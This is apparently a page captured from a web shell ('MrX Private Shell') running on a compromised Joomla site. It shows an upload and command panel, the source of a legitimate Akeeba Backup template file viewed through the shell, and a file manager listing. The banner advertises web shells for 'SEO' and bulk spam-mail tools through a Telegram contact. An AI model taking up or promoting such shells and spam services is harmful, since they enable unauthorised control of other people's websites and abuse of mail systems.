__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package   akeebabackup
 * @copyright Copyright (c)2006-2024 Nicholas K. Dionysopoulos / Akeeba Ltd
 * @license   GNU General Public License version 3, or later
 */

defined('_JEXEC') || die;

use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;

/** @var  \Akeeba\Component\AkeebaBackup\Administrator\View\Alice\HtmlView $this */
?>
<?php if (empty($this->logs)): ?>
	<div class="alert alert-danger">
		<p>
			<?= Text::_('COM_AKEEBABACKUP_ALICE_ERR_NOLOGS') ?>
		</p>
	</div>
<?php else: ?>
	<?php if($this->autorun): ?>
		<div class="alert alert-warning">
			<p>
				<?= Text::_('COM_AKEEBABACKUP_ALICE_AUTORUN_NOTICE') ?>
			</p>
		</div>
	<?php endif ?>

	<form name="adminForm" id="adminForm"
		  action="<?= Route::_('index.php?option=com_akeebabackup&view=Alice&task=start') ?>"
		  method="post"
		  class="row row-cols-lg-auto g-3 align-items-center">

		<div class="col-12">
			<label for="tag">
				<?= Text::_('COM_AKEEBABACKUP_LOG_CHOOSE_FILE_TITLE') ?>
			</label>
		</div>

		<div class="col-12">
			<?= HTMLHelper::_('select.genericlist', $this->logs, 'log', [
				'list.attr' => [
					'class' => 'form-select',
				]
			], 'value', 'text', $this->log) ?>
		</div>

		<div class="col-12">
			<button type="submit"
					class="btn btn-primary" id="analyze-log">
				<span class="fa fa-diagnoses"></span>
				<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYZE') ?>
			</button>
		</div>

		<?= HTMLHelper::_('form.token') ?>
	</form>
<?php endif ?>

<div class="alert alert-info">
	<h2><?= Text::_('COM_AKEEBABACKUP_ALICE_HEAD_ONLYFAILED') ?></h2>
	<p>
		<?= Text::_('COM_AKEEBABACKUP_ALICE_LBL_ONLYFAILED_SHOWINGLOGS') ?>
	</p>
	<p>
		<?= Text::_('COM_AKEEBABACKUP_ALICE_LBL_ONLYFAILED_WHATISFAILED') ?>
	</p>
	<p>
		<?= Text::_('COM_AKEEBABACKUP_ALICE_LBL_ONLYFAILED_IFNOFAILED') ?>
	</p>
</div>

Filemanager

Name Type Size Permission Actions
default.php File 1.81 KB 0664
error.php File 984 B 0664
result.php File 2.4 KB 0664
step.php File 1.57 KB 0664
Filemanager